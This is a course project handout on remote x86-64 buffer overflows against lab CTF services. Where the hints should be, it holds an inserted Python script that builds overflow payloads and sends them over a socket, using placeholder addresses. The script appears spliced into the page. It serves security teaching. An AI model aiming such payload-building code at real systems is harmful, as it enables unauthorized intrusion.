CS177: Project 5 - Remote Buffer Overflows (15% of project score)

Project Goals

The goals of this project are:

Administrative Information

The project is an individual project. It is due on Friday, June 2, 2023, 23:59:59 PST (no further deadline extensions; late flags will not be accepted).

Introduction

As you saw in the previous challenge, a buffer overflow occurs when a program tries to store more data in a buffer (a temporary data storage area) than the buffer was intended to hold. The extra data has to go somewhere, so it overflows into adjacent memory, corrupting or overwriting whatever valid data is stored there. If the buffer lives on the stack, as is the case for local variables in C, control information such as saved function return addresses can be altered, which lets an attacker redirect execution to an arbitrary address. By injecting machine code into the process memory (for example as part of the data used to overflow the buffer, or in environment variables) and pointing the overwritten return address at it, the attacker executes arbitrary instructions with the privileges of the running process.

Detailed Description

Your task is to exploit vulnerabilities in remote server applications: craft exploit inputs, inject them into the target application, and force the program to return a flag. As in previous challenges, first go to our CTFd site and launch your service instances. The site gives you the address and port where your server is running and listening for your connections.

For this challenge we have prepared two vulnerable services. The first one is the same minecraft service used in the last challenge, but now it runs remotely and has some exploit protection mechanisms enabled. Exploiting it earns full credit for this project. The second application (lazy_panel) is significantly more challenging. You will receive extra credit (an additional 10% of your project score) if you manage to exploit it. We don't expect all students to be able to do so, but we encourage everyone to at least give it a try. To keep it challenging, we don't plan to provide much support for this part.

You can find the source code (for the first application) and the binaries (for both) here. Both applications are compiled for 64-bit x86 on Linux. The binaries running on the server are exact copies of the binaries you get, so the stack layout, offsets and addresses you work out on your local copy apply to the server as well, modulo whatever randomization the enabled protections introduce.

Our service is launched by xinetd. xinetd is a wrapper that listens on a specific port and starts the corresponding program for each incoming connection. Data it receives from the network is forwarded to the program's standard input, and whatever the program writes to standard output is sent back over the network. Two practical consequences: you can test an exploit locally by piping the same bytes into the binary's standard input, and a shell spawned by your shellcode inherits the socket as its standard input and output, so it talks to you over the existing connection without any reverse-connection trick.

To talk to the services and craft your exploits, we recommend pwntools. We used gcc to build the binaries from the sources, with different command line flags for the different challenges. Run checksec on each binary to see which security-related features it was built with (stack canary, NX, PIE, RELRO) before settling on an exploitation strategy.

Hints

Performing a successful remote buffer overflow can be tricky, because it is important to get all the little details right. We hope that the previous challenge has given you experience in crafting (and debugging) your exploits. In addition to the hints from the previous challenge, here are a few more bits of information for minecraft.
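The workflow the description above lays out (pad up to the saved frame pointer, overwrite the return address, optionally append a NOP sled and shellcode, then deliver the bytes either through a local pipe or over the socket that xinetd fronts), as an added example that is not part of the course handout and is not a solution to either target. It uses only the Python standard library so it runs without pwntools (pwntools' p64, process and remote do the same jobs); the buffer size, return address and flag pattern are placeholders, not values taken from minecraft or lazy_panel.

```python
import re
import socket
import struct
import subprocess

# Placeholders for the example only: not the real layout of minecraft or
# lazy_panel.  Recover the real numbers with gdb and checksec on your copy.
EXAMPLE_BUF_SIZE = 64          # bytes from buffer start to the saved rbp
EXAMPLE_RET_ADDR = 0x401136    # hypothetical address to return into


def p64(value):
    """Pack a 64-bit address little-endian (stdlib equivalent of pwntools p64)."""
    return struct.pack("<Q", value)


def build_payload(buf_size, ret_addr, shellcode=b"", nop_count=0, saved_rbp=8):
    """Lay out [padding][saved rbp][return address][NOP sled][shellcode].

    On x86-64 the saved rbp is 8 bytes and the return address sits directly
    above it.  Bytes after the return address land higher on the stack, so if
    ret_addr is meant to hit the sled it must point past the overwritten slot.
    """
    padding = b"A" * (buf_size + saved_rbp)
    return padding + p64(ret_addr) + b"\x90" * nop_count + shellcode


def return_address_slot(payload, buf_size, saved_rbp=8):
    """Decode what the payload writes into the return-address slot."""
    start = buf_size + saved_rbp
    return struct.unpack("<Q", payload[start:start + 8])[0]


def bad_byte_offsets(payload, bad=b"\x00\n"):
    """Offsets of bytes the input routine may stop at: NUL for strcpy-style
    copies, newline for gets/fgets-style line reads.  The high bytes of a
    user-space x86-64 address are always zero, so NULs at the very end of
    the payload are usually harmless; NULs or newlines with bytes after
    them mean the tail never reaches the stack."""
    return [i for i, b in enumerate(payload) if b in bad]


def deliver_remote(host, port, payload, timeout=3.0):
    """Send the payload to the xinetd-fronted service and collect its reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
        return b"".join(chunks)


def deliver_local(binary, payload, timeout=3.0):
    """xinetd only wires the socket to stdin/stdout, so feeding the same bytes
    to the local copy through a pipe exercises the same code path."""
    proc = subprocess.run([binary], input=payload, capture_output=True,
                          timeout=timeout)
    return proc.stdout


def extract_flag(output, pattern=rb"[A-Za-z0-9_]+\{[^}\n]*\}"):
    """Pull a CTF-style flag out of the reply.  The real flag format is not
    given on the page; this pattern is an assumption."""
    match = re.search(pattern, output)
    return match.group(0) if match else None


if __name__ == "__main__":
    payload = build_payload(EXAMPLE_BUF_SIZE, EXAMPLE_RET_ADDR)
    print(payload.hex())
    print("return slot:", hex(return_address_slot(payload, EXAMPLE_BUF_SIZE)))
    print("bad byte offsets:", bad_byte_offsets(payload))
    # deliver_local("./minecraft", payload) for local testing, then
    # deliver_remote(host, port, payload) with the address CTFd gave you.
```

Check bad_byte_offsets before every send: a payload that gets truncated on the way into the buffer fails silently and looks like a wrong offset, which is the kind of little detail the hints section warns about.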
The second application (for extra credit): lazy_panel